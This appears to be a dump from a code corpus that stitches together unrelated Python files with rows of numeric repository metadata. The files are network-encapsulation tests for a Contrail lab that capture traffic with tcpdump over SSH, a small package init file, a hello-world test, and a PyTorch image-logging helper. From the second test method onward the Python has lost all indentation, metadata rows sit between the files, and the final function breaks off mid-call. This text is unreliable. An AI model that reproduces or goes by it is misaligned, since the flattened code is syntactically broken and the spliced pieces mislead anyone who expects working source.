                    router_asn=self.inputs.router_asn,
                    rt_number=mx_rt))
            assert fvn_fixture.verify_on_setup()
            vn1_fixture = self.useFixture(
                VNFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_name=vn1_name,
                    inputs=self.inputs,
                    subnets=vn1_subnets))
            assert vn1_fixture.verify_on_setup()
            # Pin the two VMs to different computes to force inter-node
            # (encapsulated) traffic.
            vm1_fixture = self.useFixture(
                VMFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_obj=vn1_fixture.obj,
                    vm_name=vm1_name,
                    node_name=host_list[0]))
            assert vm1_fixture.verify_on_setup()
            vn2_fixture = self.useFixture(
                VNFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_name=vn2_name,
                    inputs=self.inputs,
                    subnets=vn2_subnets))
            assert vn2_fixture.verify_on_setup()
            vm2_fixture = self.useFixture(
                VMFixture(
                    project_name=self.inputs.project_name,
                    connections=self.connections,
                    vn_obj=vn2_fixture.obj,
                    vm_name=vm2_name,
                    node_name=host_list[1]))
            assert vm2_fixture.verify_on_setup()
            # Fip
            fip_fixture = self.useFixture(
                FloatingIPFixture(
                    project_name=self.inputs.project_name,
                    inputs=self.inputs,
                    connections=self.connections,
                    pool_name=fip_pool_name,
                    vn_id=fvn_fixture.vn_id))
            assert fip_fixture.verify_on_setup()
            fip_id = fip_fixture.create_and_assoc_fip(
                fvn_fixture.vn_id, vm1_fixture.vm_id)
            self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
            assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
            routing_instance = fvn_fixture.ri_name
            # Configuring all control nodes here
            for entry in self.inputs.bgp_ips:
                hostname = self.inputs.host_data[entry]['name']
                entry_control_ip = self.inputs.host_data[
                    entry]['host_control_ip']
                cn_fixture1 = self.useFixture(
                    CNFixture(
                        connections=self.connections,
                        router_name=hostname,
                        router_ip=entry_control_ip,
                        router_type='contrail',
                        inputs=self.inputs))
            # Add the MX as a BGP peer and allow the session to come up.
            cn_fixturemx = self.useFixture(
                CNFixture(
                    connections=self.connections,
                    router_name=router_name,
                    router_ip=router_ip,
                    router_type='mx',
                    inputs=self.inputs))
            sleep(10)
            assert cn_fixturemx.verify_on_setup()
            # Policy
            # Apply policy in between VN
            policy1_name = 'policy1'
            policy2_name = 'policy2'
            rules = [
                {
                    'direction': '<>', 'simple_action': 'pass',
                    'protocol': 'icmp',
                    'source_network': vn1_name,
                    'dest_network': vn2_name,
                },
            ]
            rev_rules = [
                {
                    'direction': '<>', 'simple_action': 'pass',
                    'protocol': 'icmp',
                    'source_network': vn2_name,
                    'dest_network': vn1_name,
                },
            ]
            policy1_fixture = self.useFixture(
                PolicyFixture(
                    policy_name=policy1_name,
                    rules_list=rules,
                    inputs=self.inputs,
                    connections=self.connections))
            policy2_fixture = self.useFixture(
                PolicyFixture(
                    policy_name=policy2_name,
                    rules_list=rev_rules,
                    inputs=self.inputs,
                    connections=self.connections))
            self.logger.info('Apply policy between VN %s and %s' %
                             (vn1_name, vn2_name))
            vn1_fixture.bind_policies(
                [policy1_fixture.policy_fq_name], vn1_fixture.vn_id)
            self.addCleanup(
                vn1_fixture.unbind_policies, vn1_fixture.vn_id, [
                    policy1_fixture.policy_fq_name])
            vn2_fixture.bind_policies(
                [policy2_fixture.policy_fq_name], vn2_fixture.vn_id)
            self.addCleanup(
                vn2_fixture.unbind_policies, vn2_fixture.vn_id, [
                    policy2_fixture.policy_fq_name])
            vm1_fixture.wait_till_vm_is_up()
            vm2_fixture.wait_till_vm_is_up()
            self.logger.info(
                'Checking connectivity within VNS cluster through Policy')
            self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
            self.tcpdump_start_on_all_compute()
            if not vm1_fixture.ping_with_certainty(
                    vm2_fixture.vm_ip,
                    count='15'):
                result = result and False
            comp_vm1_ip = vm1_fixture.vm_node_ip
            comp_vm2_ip = vm2_fixture.vm_node_ip
            # Intra-cluster traffic should use the highest-priority encap
            # (MPLSoUDP) on both computes.
            self.tcpdump_analyze_on_compute(comp_vm1_ip, 'UDP')
            self.tcpdump_analyze_on_compute(comp_vm2_ip, 'UDP')
            self.logger.info(
                'Checking connectivity outside VNS cluster through FIP')
            self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
            self.tcpdump_start_on_all_compute()
            if not vm1_fixture.ping_with_certainty(
                    self.inputs.public_host,
                    count='15'):
                result = result and False
            comp_vm1_ip = vm1_fixture.vm_node_ip
            # NOTE(review): traffic toward the MX gateway is checked for GRE
            # encap — presumably the MX peer only supports MPLSoGRE; confirm
            # against lab configuration.
            self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
            if not result:
                self.logger.error(
                    'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed')
            assert result
        else:
            self.logger.info(
                "Skipping Test. Env variable MX_TEST is not set. Skipping the test")
            raise self.skipTest(
                "Skipping Test. Env variable MX_TEST is not set. Skipping the test")
        return True
    # end test_apply_policy_fip_on_same_vn_gw_mx
@test.attr(type='serial')
@preposttest_wrapper
def test_apply_policy_fip_vn_with_encaps_change_gw_mx(self):
'''A particular VN is configured with policy to talk across VN's and FIP to access outside.The encapsulation prioritis set at the start of testcase are changed and verified '''
if (('MX_GW_TEST' in os.environ) and (
os.environ.get('MX_GW_TEST') == '1')):
if len(self.connections.nova_h.get_hosts()) < 2:
self.logger.info(
"Skipping Test. At least 2 compute node required to run the test")
raise self.skipTest(
'Skipping Test. At least 2 compute node required to run the test')
self.logger.info("Read the existing encap priority")
existing_encap = self.connections.read_vrouter_config_encap()
self.logger.info('Setting new Encap before continuing')
config_id = self.connections.update_vrouter_config_encap(
'MPLSoUDP', 'MPLSoGRE', 'VXLAN')
self.logger.info('Created.UUID is %s' % (config_id))
configured_encap_list = [
str('MPLSoUDP'), str('MPLSoGRE'), str('VXLAN')]
if existing_encap != configured_encap_list :
self.addCleanup(self.connections.update_vrouter_config_encap, existing_encap[0], existing_encap[1], existing_encap[2])
encap_list = self.connections.read_vrouter_config_encap()
if configured_encap_list != encap_list:
self.logger.error(
"Configured Encap Priority order is NOT matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
assert False
else:
self.logger.info(
"Configured Encap Priority order is matching with expected order. Configured: %s ,Expected: %s" %
(configured_encap_list, encap_list))
result = True
fip_pool_name = self.inputs.fip_pool_name
fvn_name = 'public100'
fip_subnets = [self.inputs.fip_pool]
vm1_name = 'vm200'
vn1_name = 'vn200'
vn1_subnets = ['11.1.1.0/24']
vm2_name = 'vm300'
vn2_name = 'vn300'
vn2_subnets = ['22.1.1.0/24']
api_server_port = self.inputs.api_server_port
api_server_ip = self.inputs.cfgm_ip
mx_rt = self.inputs.mx_rt
router_name = self.inputs.ext_routers[0][0]
router_ip = self.inputs.ext_routers[0][1]
self.project_fixture = self.useFixture(
ProjectFixture(
project_name=self.inputs.project_name,
connections=self.connections))
self.logger.info(
'Default SG to be edited for allow all on project: %s' %
self.inputs.project_name)
self.project_fixture.set_sec_group_for_allow_all(
self.inputs.project_name, 'default')
# Get all compute host
host_list = self.connections.nova_h.get_hosts()
fvn_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=fvn_name,
inputs=self.inputs,
subnets=fip_subnets,
router_asn=self.inputs.router_asn,
rt_number=mx_rt))
assert fvn_fixture.verify_on_setup()
vn1_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn1_name,
inputs=self.inputs,
subnets=vn1_subnets))
assert vn1_fixture.verify_on_setup()
vm1_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn1_fixture.obj,
vm_name=vm1_name,
node_name=host_list[0]))
assert vm1_fixture.verify_on_setup()
vn2_fixture = self.useFixture(
VNFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_name=vn2_name,
inputs=self.inputs,
subnets=vn2_subnets))
assert vn2_fixture.verify_on_setup()
vm2_fixture = self.useFixture(
VMFixture(
project_name=self.inputs.project_name,
connections=self.connections,
vn_obj=vn2_fixture.obj,
vm_name=vm2_name,
node_name=host_list[1]))
assert vm2_fixture.verify_on_setup()
# Fip
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name,
inputs=self.inputs,
connections=self.connections,
pool_name=fip_pool_name,
vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vm1_fixture, fvn_fixture)
routing_instance = fvn_fixture.ri_name
# Configuring all control nodes here
for entry in self.inputs.bgp_ips:
hostname = self.inputs.host_data[entry]['name']
entry_control_ip = self.inputs.host_data[
entry]['host_control_ip']
cn_fixture1 = self.useFixture(
CNFixture(
connections=self.connections,
router_name=hostname,
router_ip=entry_control_ip,
router_type='contrail',
inputs=self.inputs))
cn_fixturemx = self.useFixture(
CNFixture(
connections=self.connections,
router_name=router_name,
router_ip=router_ip,
router_type='mx',
inputs=self.inputs))
sleep(10)
assert cn_fixturemx.verify_on_setup()
# Policy
# Apply policy in between VN
policy1_name = 'policy1'
policy2_name = 'policy2'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': vn1_name,
'dest_network': vn2_name,
},
]
rev_rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': vn2_name,
'dest_network': vn1_name,
},
]
policy1_fixture = self.useFixture(
PolicyFixture(
policy_name=policy1_name,
rules_list=rules,
inputs=self.inputs,
connections=self.connections))
policy2_fixture = self.useFixture(
PolicyFixture(
policy_name=policy2_name,
rules_list=rev_rules,
inputs=self.inputs,
connections=self.connections))
self.logger.info('Apply policy between VN %s and %s' %
(vn1_name, vn2_name))
vn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], vn1_fixture.vn_id)
self.addCleanup(
vn1_fixture.unbind_policies, vn1_fixture.vn_id, [
policy1_fixture.policy_fq_name])
vn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], vn2_fixture.vn_id)
self.addCleanup(
vn2_fixture.unbind_policies, vn2_fixture.vn_id, [
policy2_fixture.policy_fq_name])
vm1_fixture.wait_till_vm_is_up()
vm2_fixture.wait_till_vm_is_up()
self.logger.info(
'Checking connectivity within VNS cluster through Policy')
self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
vm2_fixture.vm_ip,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
comp_vm2_ip = vm2_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'UDP')
self.tcpdump_analyze_on_compute(comp_vm2_ip, 'UDP')
self.logger.info(
'Checking connectivity outside VNS cluster through FIP')
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
if not result:
self.logger.error(
'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed')
assert result
self.logger.info('Now changing the encapsulation priorities')
self.logger.info(
'The new encapsulation will take effect once bug 1422 is fixed')
res = self.connections.update_vrouter_config_encap(
'MPLSoGRE', 'MPLSoUDP', 'VXLAN')
self.logger.info('Updated.%s' % (res))
self.logger.info(
'Checking connectivity within VNS cluster through Policy')
self.logger.info('Ping from %s to %s' % (vm1_name, vm2_name))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
vm2_fixture.vm_ip,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
comp_vm2_ip = vm2_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
self.tcpdump_analyze_on_compute(comp_vm2_ip, 'GRE')
self.logger.info(
'Checking connectivity outside VNS cluster through FIP')
self.logger.info("Now trying to ping %s" % (self.inputs.public_host))
self.tcpdump_start_on_all_compute()
if not vm1_fixture.ping_with_certainty(
self.inputs.public_host,
count='15'):
result = result and False
comp_vm1_ip = vm1_fixture.vm_node_ip
self.tcpdump_analyze_on_compute(comp_vm1_ip, 'GRE')
if not result:
self.logger.error(
'Test to verify the Traffic to Inside and Outside Virtual network cluster simaltaneiously failed after changing the encapsulation')
assert result
else:
self.logger.info(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
raise self.skipTest(
"Skipping Test. Env variable MX_TEST is not set. Skipping the test")
return True
# end test_apply_policy_fip_vn_with_encaps_change_gw_mx
# end TestEncapsulation
#
def start_tcpdump(self, session, cmd, pcap=None):
self.logger.info("Starting tcpdump to capture the packets.")
result = execute_cmd(session, cmd, self.logger)
if pcap:
assert check_pcap_file_exists(session, pcap),'pcap not got created'
# end start_tcpdump
def stop_tcpdump(self, session):
self.logger.info("Stopping any tcpdump process running")
cmd = 'kill $(pidof tcpdump)'
execute_cmd(session, cmd, self.logger)
self.logger.info("Removing any encap-pcap files in /tmp")
cmd = 'rm -f /tmp/encap*pcap'
execute_cmd(session, cmd, self.logger)
# end stop_tcpdump
def tcpdump_start_on_all_compute(self):
for compute_ip in self.inputs.compute_ips:
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
inspect_h = self.agent_inspect[compute_ip]
comp_intf = inspect_h.get_vna_interface_by_type('eth')
if len(comp_intf) >= 1:
comp_intf = comp_intf[0]
self.logger.info('Agent interface name: %s' % comp_intf)
pcap1 = '/tmp/encap-udp.pcap'
pcap2 = '/tmp/encap-gre.pcap'
pcap3 = '/tmp/encap-vxlan.pcap'
cmd1 = 'tcpdump -ni %s udp port 6635 -w %s -s 0' % (
comp_intf, pcap1)
cmd_udp = "nohup " + cmd1 + " >& /dev/null < /dev/null &"
cmd2 = 'tcpdump -ni %s proto 47 -w %s -s 0' % (comp_intf, pcap2)
cmd_gre = "nohup " + cmd2 + " >& /dev/null < /dev/null &"
cmd3 = 'tcpdump -ni %s dst port 4789 -w %s -s 0' % (
comp_intf, pcap3)
cmd_vxlan = "nohup " + cmd3 + " >& /dev/null < /dev/null &"
self.start_tcpdump(session, cmd_udp, pcap1)
self.start_tcpdump(session, cmd_gre, pcap2)
self.start_tcpdump(session, cmd_vxlan, pcap3)
#just to make sure tcpdump starts listening
sleep(5)
# end tcpdump_on_all_compute
def tcpdump_stop_on_all_compute(self):
sessions = {}
for compute_ip in self.inputs.compute_ips:
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
# end tcpdump_on_all_compute
def tcpdump_stop_on_compute(self, compute_ip):
sessions = {}
compute_user = self.inputs.host_data[compute_ip]['username']
compute_password = self.inputs.host_data[compute_ip]['password']
session = ssh(compute_ip, compute_user, compute_password)
self.stop_tcpdump(session)
def tcpdump_analyze_on_compute(
self,
comp_ip,
pcaptype,
vxlan_id=None,
vlan_id=None):
sleep(2)
sessions = {}
compute_user = self.inputs.host_data[comp_ip]['username']
compute_password = self.inputs.host_data[comp_ip]['password']
session = ssh(comp_ip, compute_user, compute_password)
self.logger.info("Analyzing on compute node %s" % comp_ip)
if pcaptype == 'UDP':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
if count2 != 0 and count3 == 0:
self.logger.info(
"%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen as expected" %
(count2, count3))
return True
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected" % (
count2, count3)
self.logger.error(errmsg)
assert False, errmsg
elif pcaptype == 'GRE':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
if count2 == 0 and count3 != 0:
self.logger.info(
"%s GRE encapsulated packets are seen and %s UDP encapsulated packets are seen as expected" %
(count3, count2))
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
return True
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected" % (
count2, count3)
self.logger.error(errmsg)
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
assert False, errmsg
elif pcaptype == 'VXLAN':
pcaps1 = '/tmp/encap-udp.pcap'
pcaps2 = '/tmp/encap-gre.pcap'
pcaps3 = '/tmp/encap-vxlan.pcap'
cmd2 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps1
out2, err = execute_cmd_out(session, cmd2, self.logger)
cmd3 = 'tcpdump -r %s | grep GRE | wc -l' % pcaps2
out3, err = execute_cmd_out(session, cmd3, self.logger)
count2 = int(out2.strip('\n'))
count3 = int(out3.strip('\n'))
cmd3 = 'tcpdump -r %s | grep UDP |wc -l' % pcaps3
out3, err = execute_cmd_out(session, cmd3, self.logger)
count = int(out3.strip('\n'))
if count2 == 0 and count3 == 0 and count != 0:
self.logger.info(
"%s GRE encapsulated packets are seen and %s UDP encapsulated packets are seen and %s vxlan packets are seen as expected" %
(count3, count2, count))
# self.tcpdump_stop_on_all_compute()
if vxlan_id is not None:
cmd4 = 'tcpdump -AX -r %s | grep ' % pcaps3 + \
vxlan_id + ' |wc -l'
out4, err = execute_cmd_out(session, cmd4, self.logger)
count_vxlan_id = int(out4.strip('\n'))
if count_vxlan_id < count:
errmsg = "%s vxlan packet are seen with %s vxlan_id . Not Expected . " % (
count, count_vxlan_id)
self.tcpdump_stop_on_compute(comp_ip)
self.logger.error(errmsg)
assert False, errmsg
else:
self.logger.info(
"%s vxlan packets are seen with %s vxlan_id as expexted . " %
(count, count_vxlan_id))
self.tcpdump_stop_on_compute(comp_ip)
else:
errmsg = "%s UDP encapsulated packets are seen and %s GRE encapsulated packets are seen.Not expected, %s vxlan packet seen" % (
count2, count3, count)
self.logger.error(errmsg)
# self.tcpdump_stop_on_all_compute()
self.tcpdump_stop_on_compute(comp_ip)
assert False, errmsg
if vlan_id is not None:
cmd5 = 'tcpdump -AX -r %s | grep %s |wc -l' % (pcaps3, vlan_id)
out5, err = execute_cmd_out(session, cmd5, self.logger)
count_vlan_id = int(out5.strip('\n'))
if count_vlan_id < count:
errmsg = "%s vxlan packet are seen with %s vlan_id . Not Expected . " % (
count, count_vlan_id)
self.logger.error(errmsg)
assert False, errmsg
else:
self.logger.info(
"%s vxlan packets are seen with %s vlan_id as expexted . " %
(count, count_vlan_id))
return True
# return True
# end tcpdump_analyze_on_compute
#
| 44.825231 | 184 | 0.554985 | 4,307 | 38,729 | 4.735315 | 0.090318 | 0.048541 | 0.033636 | 0.025742 | 0.86786 | 0.854082 | 0.83849 | 0.819171 | 0.806227 | 0.794263 | 0 | 0.016957 | 0.3635 | 38,729 | 863 | 185 | 44.877173 | 0.810393 | 0.040202 | 0 | 0.823841 | 0 | 0.002649 | 0.145801 | 0.001132 | 0 | 0 | 0 | 0.001159 | 0.046358 | 1 | 0.01457 | false | 0.017219 | 0.022517 | 0 | 0.046358 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4382ec618cee3bfdd183fce97282f59a4fd8e254 | 121 | py | Python | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | null | null | null | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | null | null | null | basics/python/practice/package/animal/__init__.py | haochunchang/Bioinformatics_Course | c060c1cfe2ccc3c6f0adbe3e414b3c7ce8a5385c | [
"MIT"
] | 3 | 2020-04-12T04:43:24.000Z | 2021-11-30T02:01:02.000Z | from __future__ import absolute_import
from .animals import Animal
from .animals import Cat
from .animals import JOBRANK | 24.2 | 38 | 0.842975 | 17 | 121 | 5.705882 | 0.470588 | 0.340206 | 0.525773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132231 | 121 | 5 | 39 | 24.2 | 0.92381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
43cbcddf89d293a4c44b5ed6c5d82901b3ad72b4 | 108 | py | Python | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | test/solution_tests/HLO/test_hlo.py | DPNT-Sourcecode/CHK-gict01 | e21dd29eb7ab7ba4558565591750890b16f5cfe9 | [
"Apache-2.0"
] | null | null | null | from solutions.HLO import hello
def test_hello_world_r2():
assert hello("random") == "Hello, random!"
| 18 | 46 | 0.712963 | 15 | 108 | 4.933333 | 0.733333 | 0.297297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.157407 | 108 | 5 | 47 | 21.6 | 0.802198 | 0 | 0 | 0 | 0 | 0 | 0.185185 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
605a34d901177b5a9ac1e747be53772dc41c8722 | 11,188 | py | Python | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | tools.py | lvxingvir/template | 089f5817e031a7c2b2d82e239158a6a5488b3b26 | [
"MIT"
] | null | null | null | import torch
import torchvision
import numpy as np
import matplotlib.pylab as plt
def calculate_accuracy_binary(outputs, targets):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
hit = ((outputs > 0.5) == targets).sum()
#hit = sum(abs(outputs-targets))
tsum = targets.shape[0]
return (hit + 1e-8) / (tsum + 1e-8)
def calculate_accuracy(outputs, targets):
#outputs = outputs.data.cpu().numpy().flatten()
#targets = targets.data.cpu().numpy().flatten()
max_vals, max_indices = torch.max(outputs, 1)
acc = (max_indices == targets.long()).sum().data.cpu().numpy() / max_indices.size()[0]
return acc
def image_cat(inputs,bs):
data=[]
for h in range(bs):
data.append(inputs[h, :, :, :])
data = [x for x in data]
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True,
range=None, scale_each=True)
return data_all
def add_image_unet(inputs,masks,est_maps,outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data_all = image_cat(inputs,targets.shape[0])
mask_all = image_cat(masks, targets.shape[0])
estmaps_all = image_cat(est_maps, targets.shape[0])
if subset == 'val':
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
else:
writer.add_image(subset + '_step_' + str(epoch ),img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image_3d(inputs, outputs, targets, writer, subset, epoch,name):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data = []
for h in range(targets.shape[0]):
data.append(inputs[h, :, :, :])
data = [x for x in data]
# data = torch.cat(data, dim=0)
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True, range=None, scale_each=True)
# if subset == 'val':
# writer.add_image(subset + '_step_' + str(epoch) + '/Diff_'+str(sum(sum(abs(outputs-targets)))) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
# img_tensor=data_all, global_step=epoch, dataformats='CHW')
if subset == 'val':
# print('val image added')
writer.add_image(subset + '_step_' + str(epoch) +'/'+ name + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
else:
# print('train image added')
writer.add_image(subset + '_step_' + str(epoch )+'/'+name,img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image(inputs, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data = []
data.append(inputs[h, :, :, :])
data = [x for x in data]
data = torch.cat(data, dim=1)
data_all = torchvision.utils.make_grid(data, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_gl_image(images,patches, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
def add_gld_image(images,patches,details, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
writer.add_image(
